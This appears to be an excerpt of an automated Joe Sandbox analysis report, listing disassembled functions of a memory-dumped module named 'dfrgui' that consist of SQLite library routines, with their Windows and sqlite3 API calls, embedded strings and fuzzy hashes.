                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_errcode.SQLITE3 ref: 61E932F1
                                                                                              • sqlite3_close.SQLITE3 ref: 61E93302
                                                                                              • sqlite3_free.SQLITE3 ref: 61E9331F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                                                              • String ID: BINARY$NOCASE$RTRIM$`1a$fts3$fts4$fts5$fts5vocab$h,a$porter$rtree$rtree_i32$simple$unicode61
                                                                                              • API String ID: 1097977795-3723990393
                                                                                              • Opcode ID: 34542269ac24add44832506ab8adc97a24ce565a994c45d636892361de556e6e
                                                                                              • Instruction ID: 04396e4e8c081e79777a81cb76cfc5092588615b200e9ca745df3807d6096530
                                                                                              • Opcode Fuzzy Hash: 34542269ac24add44832506ab8adc97a24ce565a994c45d636892361de556e6e
                                                                                              • Instruction Fuzzy Hash: FE7206B0A083428BE700DF69C49534ABBE1BF95708F25CC2DE8999B395D779C845CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?,?,61EAE400,?,61E19320,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1956D
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E19583
                                                                                                • Part of subcall function 61E194F0: sqlite3_initialize.SQLITE3(?,?,61E19588), ref: 61E194FB
                                                                                                • Part of subcall function 61E194F0: sqlite3_mutex_enter.SQLITE3(?,?,61E19588), ref: 61E19513
                                                                                                • Part of subcall function 61E194F0: sqlite3_mutex_leave.SQLITE3(?), ref: 61E19545
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E19597
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E195AB
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E195BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 3532963230-0
                                                                                              • Opcode ID: af9367acd9bb657ed331947dda9311c1f067872b8ef6359b94e462143c9243d0
                                                                                              • Instruction ID: 6d0d412f49644ea53ed79f6f68b23b94a644fcacb4ad3fcd9eba45d30bda88e5
                                                                                              • Opcode Fuzzy Hash: af9367acd9bb657ed331947dda9311c1f067872b8ef6359b94e462143c9243d0
                                                                                              • Instruction Fuzzy Hash: 23F0F9B0548641ABD700AFA9C18675FBBE5AFC2708F22C82CD4858B295C7B5C8448B93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                              • String ID: -journal$@
                                                                                              • API String ID: 42632313-41206085
                                                                                              • Opcode ID: 40c689dc1cc61a3de58058952e5f429362b20efe2b2a30fe5884249aaa52c7a5
                                                                                              • Instruction ID: fad57ea04c3ed1a2a289cc891a4be8110211e8b1c2718681ceb6113754037920
                                                                                              • Opcode Fuzzy Hash: 40c689dc1cc61a3de58058952e5f429362b20efe2b2a30fe5884249aaa52c7a5
                                                                                              • Instruction Fuzzy Hash: 29820574A04259CFEB20CF68C984B89BBF1BF49308F2981E9D858AB352D774D985CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1922D
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1923A
                                                                                              • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E192CE
                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E192F4
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19316
                                                                                              • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1931B
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E193F7
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19402
                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1941E
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19433
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                              • String ID: `Aa
                                                                                              • API String ID: 1590227068-4150638200
                                                                                              • Opcode ID: 3dc21433d400701e44026c1dc62b4f0183e2b2090de9d18710cf785c8c7a32fa
                                                                                              • Instruction ID: b8cb39d1aa9a75ed5e5362b64b399c3cfccd9f63d9053fb2d41c374444a4c4a7
                                                                                              • Opcode Fuzzy Hash: 3dc21433d400701e44026c1dc62b4f0183e2b2090de9d18710cf785c8c7a32fa
                                                                                              • Instruction Fuzzy Hash: EB813E70A58A458FEF049FA9C4853597AF1BFCA319F24882ED844DB394EB79C8C5CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E700
                                                                                                • Part of subcall function 61E3E3A1: sqlite3_free.SQLITE3 ref: 61E3E413
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3E72D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E792
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E79D
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3E812
                                                                                              • CreateFileW.KERNEL32 ref: 61E3E852
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E98D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E998
                                                                                                • Part of subcall function 61E189F3: sqlite3_win32_sleep.SQLITE3 ref: 61E18A4B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EA2C
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EA37
                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3EA75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                                                              • String ID: winOpen
                                                                                              • API String ID: 1995518269-2556188131
                                                                                              • Opcode ID: 2433654a142791891781cac68bed4388ded419e5e0d7d29fd9d0943fb19c1bd9
                                                                                              • Instruction ID: 90af8dfd4577a76acb09c138b1361f2ecc4fcac60cf97447081b4db11295945f
                                                                                              • Opcode Fuzzy Hash: 2433654a142791891781cac68bed4388ded419e5e0d7d29fd9d0943fb19c1bd9
                                                                                              • Instruction Fuzzy Hash: C5D1B5749047598FEB10DFAAC48578EBBF0BF84358F248929E8A49B390E774D985CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              • sqlite_master, xrefs: 61E642C9
                                                                                              • sqlite_temp_master, xrefs: 61E642CF
                                                                                              • unsupported file format, xrefs: 61E64470
                                                                                              • attached databases must use the same text encoding as main database, xrefs: 61E64406
                                                                                              • Va, xrefs: 61E642FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Va$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                              • API String ID: 0-1175239378
                                                                                              • Opcode ID: f5fa7c1be61233e57696f3a6f84755a70697a207930041fbbaf071b09d031384
                                                                                              • Instruction ID: 93b59210f787bba4d718a7916ed7ffc49a752ed9f319999632f18046b431d1aa
                                                                                              • Opcode Fuzzy Hash: f5fa7c1be61233e57696f3a6f84755a70697a207930041fbbaf071b09d031384
                                                                                              • Instruction Fuzzy Hash: 8FA11174A443498BEB10CFA9C490B8DBBF5BF89318F60C56ED868AB355D734E845CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_mutex_try
                                                                                              • String ID: 0
                                                                                              • API String ID: 2794522359-4108050209
                                                                                              • Opcode ID: b40f6e538b8f0b04e2242111901c35f0d3ac3950cb2c7f33ea6feeba81fb13a6
                                                                                              • Instruction ID: ad066da3eee73bf1192e979285553922ddeee5aa2cf31c0f95315944b97c264a
                                                                                              • Opcode Fuzzy Hash: b40f6e538b8f0b04e2242111901c35f0d3ac3950cb2c7f33ea6feeba81fb13a6
                                                                                              • Instruction Fuzzy Hash: 69128A70A042458FEF15CFA8E484799BBF1BF88308F24C1A9D855DB396E774E896CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • sqlite3_strnicmp.SQLITE3 ref: 61E64B82
                                                                                                • Part of subcall function 61E04223: sqlite3_stricmp.SQLITE3 ref: 61E04258
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmpsqlite3_strnicmp
                                                                                              • String ID: no such table$no such view
                                                                                              • API String ID: 456569458-301769730
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID: winRead
                                                                                              • API String ID: 2738559852-2759563040
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10F58
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E11000
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: mallocsqlite3_log
                                                                                              • String ID:
                                                                                              • API String ID: 2785431543-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free
                                                                                              • String ID:
                                                                                              • API String ID: 2313487548-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E274F6
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E27516
                                                                                              • sqlite3_value_blob.SQLITE3 ref: 61E27523
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E2753A
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E2758A
                                                                                              • sqlite3_result_text64.SQLITE3 ref: 61E276DA
                                                                                              • sqlite3_result_blob64.SQLITE3 ref: 61E27734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3992148849-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_malloc64$memcmpsqlite3_freesqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 1852262425-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 61E936D9
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E936EA
                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E936F2
                                                                                              • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E936FA
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E93709
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E77899
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E77AA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID: BINARY$INTEGER
                                                                                              • API String ID: 1477753154-1676293250
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E478D2
                                                                                                • Part of subcall function 61E13FAA: sqlite3_mutex_try.SQLITE3(?,?,?,61E1402A), ref: 61E13F4A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E478EB
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E47A04
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E47E0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                              • String ID:
                                                                                              • API String ID: 2068833801-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_bind_int64.SQLITE3 ref: 61E25A35
                                                                                                • Part of subcall function 61E25863: sqlite3_mutex_leave.SQLITE3 ref: 61E258A2
                                                                                              • sqlite3_bind_double.SQLITE3 ref: 61E25A58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465616180-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E25AF4
                                                                                              • sqlite3_bind_zeroblob.SQLITE3 ref: 61E25B19
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E25B39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 2187339821-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1081B
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1087E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10753
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1079E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E256A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 70db542e2442cb87d82130d2572cea195df8602eecf264f30fa4d2e9f1950318
                                                                                              • Instruction ID: 043b1b158e7823502beb08aad275c8d825e1f2bfaf8fca04309f5db98610adc9
                                                                                              • Opcode Fuzzy Hash: 70db542e2442cb87d82130d2572cea195df8602eecf264f30fa4d2e9f1950318
